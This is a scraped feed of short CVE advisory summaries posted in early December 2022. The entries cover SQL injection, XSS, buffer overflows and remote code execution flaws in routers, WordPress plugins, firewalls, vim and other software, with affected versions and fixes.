🚨 CVE-2022-42759In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:32 |
🚨 CVE-2022-42760In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:31 |
🚨 CVE-2022-42761In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:29 |
🚨 CVE-2022-42762In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:27 |
🚨 CVE-2022-42763In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:25 |
🚨 CVE-2022-42764In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:24 |
🚨 CVE-2022-42765In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 07:49:15 |
🚨 CVE-2022-24439All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.🎖@cveNotify |
|
| 2022-12-06 07:49:14 |
🚨 CVE-2022-25912The package simple-git before 3.15.0 are vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method.This vulnerability exists due to an incomplete fix of [CVE-2022-24066](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2434306).🎖@cveNotify |
|
| 2022-12-06 07:49:12 |
🚨 CVE-2022-34881Generation of Error Message Containing Sensitive Information vulnerability in Hitachi JP1/Automatic Operation allows local users to gain sensitive information. This issue affects JP1/Automatic Operation: from 10-00 through 10-54-03, from 11-00 before 11-51-09, from 12-00 before 12-60-01.🎖@cveNotify |
|
| 2022-12-06 07:49:11 |
🚨 CVE-2022-40603A cross-site scripting (XSS) vulnerability in the CGI program of Zyxel ZyWALL/USG series firmware versions 4.30 through 4.72, VPN series firmware versions 4.30 through 5.31, USG FLEX series firmware versions 4.50 through 5.31, and ATP series firmware versions 4.32 through 5.31, which could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. Then, the attacker could gain access to some browser-based information if the malicious script is executed on the victim’s browser.🎖@cveNotify |
|
| 2022-12-06 07:49:10 |
🚨 CVE-2022-46151Querybook is an open source data querying UI. In affected versions user provided data is not escaped in the error field of the auth callback url in `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. This may allow attackers to perform reflected cross site scripting (XSS) if Content Security Policy (CSP) is not enabled or `unsafe-inline` is allowed. Users are advised to upgrade to the latest, patched version of querybook (version 3.14.2 or greater). Users unable to upgrade may enable CSP and not allow unsafe-inline or manually escape query parameters in a reverse proxy.🎖@cveNotify |
|
| 2022-12-06 07:49:09 |
🚨 CVE-2022-4273A vulnerability, which was classified as critical, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the file /hrm/controller/employee.php of the component Content-Type Handler. The manipulation of the argument pfimg leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214769 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-06 07:49:08 |
🚨 CVE-2022-4274A vulnerability, which was classified as critical, was found in House Rental System. Affected is an unknown function of the file /view-property.php. The manipulation of the argument property_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214770 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-06 07:49:07 |
🚨 CVE-2022-4275A vulnerability has been found in House Rental System and classified as critical. Affected by this vulnerability is an unknown functionality of the file search-property.php of the component POST Request Handler. The manipulation of the argument search_property leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214771.🎖@cveNotify |
|
| 2022-12-06 07:49:05 |
🚨 CVE-2022-4276A vulnerability was found in House Rental System and classified as critical. Affected by this issue is some unknown functionality of the file tenant-engine.php of the component POST Request Handler. The manipulation of the argument id_photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214772.🎖@cveNotify |
|
| 2022-12-06 07:49:04 |
🚨 CVE-2022-4277A vulnerability was found in Shaoxing Background Management System. It has been declared as critical. This vulnerability affects unknown code of the file /Default/Bd. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-214774 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-06 07:49:03 |
🚨 CVE-2022-4278A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /hrm/employeeadd.php. The manipulation of the argument empid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214775.🎖@cveNotify |
|
| 2022-12-06 07:49:02 |
🚨 CVE-2022-4279A vulnerability classified as problematic has been found in SourceCodester Human Resource Management System 1.0. Affected is an unknown function of the file /hrm/employeeview.php. The manipulation of the argument search leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214776.🎖@cveNotify |
|
| 2022-12-06 07:49:00 |
🚨 CVE-2022-3491Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0742.🎖@cveNotify |
|
| 2022-12-06 07:48:59 |
🚨 CVE-2022-44291webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.🎖@cveNotify |
|
| 2022-12-06 07:48:58 |
🚨 CVE-2022-44290webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.🎖@cveNotify |
|
| 2022-12-06 02:47:40 |
🚨 CVE-2022-44951Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.🎖@cveNotify |
|
| 2022-12-06 02:47:39 |
🚨 CVE-2022-44948Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".🎖@cveNotify |
|
| 2022-12-06 02:47:35 |
🚨 CVE-2022-45670Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the ping1 parameter in the formSetAutoPing function.🎖@cveNotify |
|
| 2022-12-06 02:47:34 |
🚨 CVE-2022-45672Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the formWx3AuthorizeSet function.🎖@cveNotify |
|
| 2022-12-06 02:47:33 |
🚨 CVE-2022-45643Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2022-12-06 02:47:29 |
🚨 CVE-2022-45673Tenda AC6V1.0 V15.03.05.19 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.🎖@cveNotify |
|
| 2022-12-06 02:47:28 |
🚨 CVE-2022-45641Tenda AC6V1.0 V15.03.05.19 is vulnerable to Buffer Overflow via formSetMacFilterCfg.🎖@cveNotify |
|
| 2022-12-06 02:47:24 |
🚨 CVE-2022-45657Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.🎖@cveNotify |
|
| 2022-12-06 02:47:23 |
🚨 CVE-2022-45656Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.🎖@cveNotify |
|
| 2022-12-06 02:47:22 |
🚨 CVE-2022-45654Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2022-12-05 23:47:40 |
🚨 CVE-2022-43553A remote code execution vulnerability in EdgeRouters (Version 2.0.9-hotfix.4 and earlier) allows a malicious actor with an operator account to run arbitrary administrator commands.This vulnerability is fixed in Version 2.0.9-hotfix.5 and later.🎖@cveNotify |
|
| 2022-12-05 23:47:39 |
🚨 CVE-2022-43556Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to XSS in the text input field since the result dashboard page output is not sanitized. The Concrete CMS security team has ranked this 4.2 with CVSS v3.1 vector AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N Thanks @_akbar_jafarli_ for reporting. Remediate by updating to Concrete CMS 8.5.10 and Concrete CMS 9.1.3.🎖@cveNotify |
|
| 2022-12-05 23:47:38 |
🚨 CVE-2022-43557The BD BodyGuard™ infusion pumps specified allow for access through the RS-232 (serial) port interface. If exploited, threat actors with physical access, specialized equipment and knowledge may be able to configure or disable the pump. No electronic protected health information (ePHI), protected health information (PHI) or personally identifiable information (PII) is stored in the pump.🎖@cveNotify |
|
| 2022-12-05 23:47:34 |
🚨 CVE-2021-34181Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml.🎖@cveNotify |
|
| 2022-12-05 23:47:33 |
🚨 CVE-2022-37783All Craft CMS versions between 3.0.0 and 3.7.32 disclose password hashes of users who authenticate using their E-Mail address or username in Anti-CSRF-Tokens. Craft CMS uses a cookie called CRAFT_CSRF_TOKEN and a HTML hidden field called CRAFT_CSRF_TOKEN to avoid Cross Site Request Forgery attacks. The CRAFT_CSRF_TOKEN cookie discloses the password hash in without encoding it whereas the corresponding HTML hidden field discloses the users' password hash in a masked manner, which can be decoded by using public functions of the YII framework.🎖@cveNotify |
|
| 2022-12-05 23:47:32 |
🚨 CVE-2022-42705A use-after-free in res_pjsip_pubsub.c in Sangoma Asterisk 16.28, 18.14, 19.6, and certified/18.9-cert2 may allow a remote authenticated attacker to crash Asterisk (denial of service) by performing activity on a subscription via a reliable transport at the same time that Asterisk is also performing activity on that subscription.🎖@cveNotify |
|
| 2022-12-05 23:47:29 |
🚨 CVE-2022-42706An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.🎖@cveNotify |
|
| 2022-12-05 23:47:28 |
🚨 CVE-2022-45479PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H🎖@cveNotify |
|
| 2022-12-05 23:47:27 |
🚨 CVE-2022-46164NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.🎖@cveNotify |
|
| 2022-12-05 21:47:55 |
🚨 CVE-2022-4211The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'emailf' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2022-12-05 21:47:53 |
🚨 CVE-2022-4212The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ipf' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2022-12-05 21:47:52 |
🚨 CVE-2022-4213The Chained Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dn' parameter on the 'chainedquiz_list' page in versions up to, and including, 1.3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2022-12-05 21:47:50 |
🚨 CVE-2022-44944Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.🎖@cveNotify |
|
| 2022-12-05 21:47:49 |
🚨 CVE-2022-44946Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.🎖@cveNotify |
|
| 2022-12-05 21:47:48 |
🚨 CVE-2022-44947Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".🎖@cveNotify |
|
| 2022-12-05 21:47:46 |
🚨 CVE-2022-45644Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the formSetClientState function.🎖@cveNotify |
|
| 2022-12-05 21:47:45 |
🚨 CVE-2022-45645Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2022-12-05 21:47:43 |
🚨 CVE-2022-43515Zabbix Frontend provides a feature that allows admins to maintain the installation and ensure that only certain IP addresses can access it. In this way, any user will not be able to access the Zabbix Frontend while it is being maintained and possible sensitive data will be prevented from being disclosed. An attacker can bypass this protection and access the instance using IP address not listed in the defined range.🎖@cveNotify |
|
| 2022-12-05 21:47:41 |
🚨 CVE-2022-4292Use After Free in GitHub repository vim/vim prior to 9.0.0882.🎖@cveNotify |
|
| 2022-12-05 21:47:40 |
🚨 CVE-2022-4293Floating Point Comparison with Incorrect Operator in GitHub repository vim/vim prior to 9.0.0804.🎖@cveNotify |
|
| 2022-12-05 21:47:39 |
🚨 CVE-2022-23467OpenRazer is an open source driver and user-space daemon to control Razer device lighting and other features on GNU/Linux. Using a modified USB device an attacker can leak stack addresses of the `razer_attr_read_dpi_stages`, potentially bypassing KASLR. To exploit this vulnerability an attacker would need to access to a users keyboard or mouse or would need to convince a user to use a modified device. The issue has been patched in v3.5.1. Users are advised to upgrade and should be reminded not to plug in unknown USB devices.🎖@cveNotify |
|
| 2022-12-05 21:47:37 |
🚨 CVE-2022-43097Phpgurukul User Registration & User Management System v3.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form & login pages.🎖@cveNotify |
|
| 2022-12-05 21:47:36 |
🚨 CVE-2022-43516A Firewall Rule which allows all incoming TCP connections to all programs from any source and to all ports is created in Windows Firewall after Zabbix agent installation (MSI)🎖@cveNotify |
|
| 2022-12-05 21:47:34 |
🚨 CVE-2022-45771An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file.🎖@cveNotify |
|
| 2022-12-05 21:47:33 |
🚨 CVE-2022-45869A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled.🎖@cveNotify |
|
| 2022-12-05 21:47:32 |
🚨 CVE-2022-38045Server Service Remote Protocol Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-05 21:47:31 |
🚨 CVE-2022-41043Microsoft Office Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2022-12-05 21:47:30 |
🚨 CVE-2022-43325An unauthenticated command injection vulnerability in the product license validation function of Telos Alliance Omnia MPX Node 1.3.* - 1.4.* allows attackers to execute arbitrary commands via a crafted payload injected into the license input.🎖@cveNotify |
|
| 2022-12-05 21:47:29 |
🚨 CVE-2022-44929An access control issue in D-Link DVG-G5402SP GE_1.03 allows unauthenticated attackers to escalate privileges via arbitrarily editing VoIP SIB profiles.🎖@cveNotify |
|
| 2022-12-05 20:47:46 |
🚨 CVE-2022-3591Use After Free in GitHub repository vim/vim prior to 9.0.0789.🎖@cveNotify |
|
| 2022-12-05 20:47:45 |
🚨 CVE-2022-28607An issue was discovered in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to gain sensitive information via the action parameter to /system/user/modules/mod_users/controller.php.🎖@cveNotify |
|
| 2022-12-05 20:47:44 |
🚨 CVE-2022-44362Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.🎖@cveNotify |
|
| 2022-12-05 20:47:43 |
🚨 CVE-2022-44363Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setSnmpInfo.🎖@cveNotify |
|
| 2022-12-05 20:47:39 |
🚨 CVE-2022-44365Tenda i21 V1.0.0.14(4656) has a stack overflow vulnerability via /goform/setSysPwd.🎖@cveNotify |
|
| 2022-12-05 20:47:38 |
🚨 CVE-2022-36431An arbitrary file upload vulnerability in Rocket TRUfusion Enterprise before 7.9.6.1 allows unauthenticated attackers to execute arbitrary code via a crafted JSP file. Issue fixed in version 7.9.6.1.🎖@cveNotify |
|
| 2022-12-05 20:47:37 |
🚨 CVE-2022-1540The PostmagThemes Demo Import WordPress plugin through 1.0.7 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) leading to RCE.🎖@cveNotify |
|
| 2022-12-05 20:47:36 |
🚨 CVE-2022-3249The WP CSV Exporter WordPress plugin before 1.3.7 does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks🎖@cveNotify |
|
| 2022-12-05 20:47:32 |
🚨 CVE-2022-3426The Advanced WP Columns WordPress plugin through 2.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-05 20:47:31 |
🚨 CVE-2022-3677The Advanced Import WordPress plugin before 1.3.8 does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks🎖@cveNotify |
|
| 2022-12-05 20:47:30 |
🚨 CVE-2022-3830The WP Page Builder WordPress plugin through 1.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-05 20:47:29 |
🚨 CVE-2022-3837The Uji Countdown WordPress plugin through 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-05 20:47:25 |
🚨 CVE-2022-3838The WPUpper Share Buttons WordPress plugin through 3.42 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-05 20:47:24 |
🚨 CVE-2022-3856The Comic Book Management System WordPress plugin before 2.2.0 does not sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.🎖@cveNotify |
|
| 2022-12-05 20:47:23 |
🚨 CVE-2022-3892The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.2 does not sanitize and escape Client IDs, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2022-12-05 17:47:48 |
🚨 CVE-2022-32596In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446213; Issue ID: ALPS07446213.🎖@cveNotify |
|
| 2022-12-05 17:47:47 |
🚨 CVE-2022-32597In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446228; Issue ID: ALPS07446228.🎖@cveNotify |
|
| 2022-12-05 17:47:46 |
🚨 CVE-2022-32619In keyinstall, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07439659; Issue ID: ALPS07439659.🎖@cveNotify |
|
| 2022-12-05 17:47:45 |
🚨 CVE-2022-32620In mpu, there is a possible memory corruption due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07541753; Issue ID: ALPS07541753.🎖@cveNotify |
|
| 2022-12-05 17:47:41 |
🚨 CVE-2022-32622In gz, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07363786; Issue ID: ALPS07363786.🎖@cveNotify |
|
| 2022-12-05 17:47:40 |
🚨 CVE-2022-32625In display, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07326216; Issue ID: ALPS07326216.🎖@cveNotify |
|
| 2022-12-05 17:47:39 |
🚨 CVE-2022-32626In display, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07326239; Issue ID: ALPS07326239.🎖@cveNotify |
|
| 2022-12-05 17:47:35 |
🚨 CVE-2022-32629In isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310774; Issue ID: ALPS07310774.🎖@cveNotify |
|
| 2022-12-05 17:47:34 |
🚨 CVE-2022-32631In Wi-Fi, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07453613; Issue ID: ALPS07453613.🎖@cveNotify |
|
| 2022-12-05 17:47:33 |
🚨 CVE-2022-32632In Wi-Fi, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441630; Issue ID: ALPS07441630.🎖@cveNotify |
|
| 2022-12-05 17:47:29 |
🚨 CVE-2022-32633In Wi-Fi, there is a possible memory access violation due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441637; Issue ID: ALPS07441637.🎖@cveNotify |
|
| 2022-12-05 17:47:28 |
🚨 CVE-2022-45476Tiny File Manager version 2.4.8 executes the code of files uploaded by users of the application, instead of just returning them for download. This is possible because the application is vulnerable to insecure file upload.🎖@cveNotify |
|
| 2022-12-05 17:47:27 |
🚨 CVE-2022-42746CandidATS version 3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks.🎖@cveNotify |
|
| 2022-12-05 15:47:36 |
🚨 CVE-2022-46156The Synthetic Monitoring Agent for Grafana's Synthetic Monitoring application provides probe functionality and executes network checks for monitoring remote targets. Users running the Synthetic Monitoring agent prior to version 0.12.0 in their local network are impacted. The authentication token used to communicate with the Synthetic Monitoring API is exposed through a debugging endpoint. This token can be used to retrieve the Synthetic Monitoring checks created by the user and assigned to the agent identified with that token. The Synthetic Monitoring API will reject connections from already-connected agents, so access to the token does not guarantee access to the checks. Version 0.12.0 contains a fix. Users are advised to rotate the agent tokens. After upgrading to version v0.12.0 or later, it's recommended that users of distribution packages review the configuration stored in `/etc/synthetic-monitoring/synthetic-monitoring-agent.conf`, specifically the `API_TOKEN` variable which has been renamed to `SM_AGENT_API_TOKEN`. As a workaround for previous versions, it's recommended that users review the agent settings and set the HTTP listening address in a manner that limits the exposure, for example, localhost or a non-routed network, by using the command line parameter `-listen-address`, e.g. `-listen-address localhost:4050`.🎖@cveNotify |
|
| 2022-12-05 15:47:35 |
🚨 CVE-2022-45046The camel-ldap component allows LDAP Injection when using the filter option. Users are recommended to either move to the Camel-Spring-Ldap component (which is not affected) or upgrade to 3.14.6 or 3.18.4.🎖@cveNotify |
|
| 2022-12-05 15:47:34 |
🚨 CVE-2022-3226An OS command injection vulnerability allows admins to execute code via SSL VPN configuration uploads in Sophos Firewall releases older than version 19.5 GA.🎖@cveNotify |
|
| 2022-12-05 15:47:30 |
🚨 CVE-2022-3696A post-auth code injection vulnerability allows admins to execute code in Webadmin of Sophos Firewall releases older than version 19.5 GA.🎖@cveNotify |
|
| 2022-12-05 15:47:29 |
🚨 CVE-2022-3710A post-auth read-only SQL injection vulnerability allows API clients to read non-sensitive configuration database contents in the API controller of Sophos Firewall releases older than version 19.5 GA.🎖@cveNotify |
|
| 2022-12-05 15:47:28 |
🚨 CVE-2022-3711A post-auth read-only SQL injection vulnerability allows users to read non-sensitive configuration database contents in the User Portal of Sophos Firewall releases older than version 19.5 GA.🎖@cveNotify |
|
| 2022-12-05 15:47:27 |
🚨 CVE-2022-3713A code injection vulnerability allows adjacent attackers to execute code in the Wifi controller of Sophos Firewall releases older than version 19.5 GA.🎖@cveNotify |
|
| 2022-12-05 14:47:29 |
🚨 CVE-2022-4281A vulnerability has been found in Facepay 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /face-recognition-php/facepay-master/camera.php. The manipulation of the argument userId leads to authorization bypass. The attack can be launched remotely. The identifier VDB-214789 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-05 11:47:26 |
🚨 CVE-2022-4282A vulnerability was found in SpringBootCMS and classified as critical. Affected by this issue is some unknown functionality of the component Template Management. The manipulation leads to injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214790 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-05 11:47:25 |
🚨 CVE-2022-41751Jhead 3.06.0.1 allows attackers to execute arbitrary OS commands by placing them in a JPEG filename and then using the regeneration -rgt50 option.🎖@cveNotify |
|
| 2022-12-05 11:47:24 |
🚨 CVE-2022-4278A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /hrm/employeeadd.php. The manipulation of the argument empid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214775.🎖@cveNotify |
|
| 2022-12-04 21:47:25 |
🚨 CVE-2022-35507A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.🎖@cveNotify |
|
| 2022-12-04 21:47:24 |
🚨 CVE-2022-35508Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) are vulnerable to SSRF when proxying HTTP requests between pve(pmg)proxy and pve(pmg)daemon. An attacker with an unprivileged account can craft an HTTP request to achieve SSRF and file disclosure of any files on the server. Also, in Proxmox Mail Gateway, privilege escalation to the root@pam account is possible if the backup feature has ever been used, because backup files such as pmg-backup_YYYY_MM_DD_*.tgz have 0644 permissions and contain an authkey value. This is fixed in pve-http-server 4.1-3.🎖@cveNotify |
|
| 2022-12-04 17:47:27 |
🚨 CVE-2021-34055jhead 3.06 is vulnerable to Buffer Overflow via exif.c in function Put16u.🎖@cveNotify |
|
| 2022-12-04 17:47:26 |
🚨 CVE-2022-41751Jhead 3.06.0.1 allows attackers to execute arbitrary OS commands by placing them in a JPEG filename and then using the regeneration -rgt50 option.🎖@cveNotify |
|
| 2022-12-04 06:47:35 |
🚨 CVE-2022-44721CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)🎖@cveNotify |
|
| 2022-12-04 06:47:34 |
🚨 CVE-2022-46411An issue was discovered in Veritas NetBackup Flex Scale through 3.0 and Access Appliance through 8.0.100. A default password is persisted after installation and may be discovered and used to escalate privileges.🎖@cveNotify |
|
| 2022-12-04 06:47:33 |
🚨 CVE-2022-46412An issue was discovered in Veritas NetBackup Flex Scale through 3.0. A non-privileged user may escape a restricted shell and execute privileged commands.🎖@cveNotify |
|
| 2022-12-04 06:47:32 |
🚨 CVE-2022-46413An issue was discovered in Veritas NetBackup Flex Scale through 3.0 and Access Appliance through 8.0.100. Authenticated remote command execution can occur via the management portal.🎖@cveNotify |
|
| 2022-12-04 06:47:31 |
🚨 CVE-2022-46414An issue was discovered in Veritas NetBackup Flex Scale through 3.0 and Access Appliance through 8.0.100. Unauthenticated remote command execution can occur via the management portal.🎖@cveNotify |
|
| 2022-12-04 06:47:30 |
🚨 CVE-2022-46405Mastodon through 4.0.2 allows attackers to cause a denial of service (large Sidekiq pull queue) by creating bot accounts that follow attacker-controlled accounts on certain other servers associated with a wildcard DNS A record, such that there is uncontrolled recursion of attacker-generated messages.🎖@cveNotify |
|
| 2022-12-04 06:47:29 |
🚨 CVE-2022-45866qpress before PierreLvx/qpress 20220819 and before version 11.3, as used in Percona XtraBackup and other products, allows directory traversal via ../ in a .qp file.🎖@cveNotify |
|
| 2022-12-04 06:47:28 |
🚨 CVE-2022-46391AWStats 7.x through 7.8 allows XSS in the hostinfo plugin due to printing a response from Net::XWhois without proper checks.🎖@cveNotify |
|
| 2022-12-04 06:47:26 |
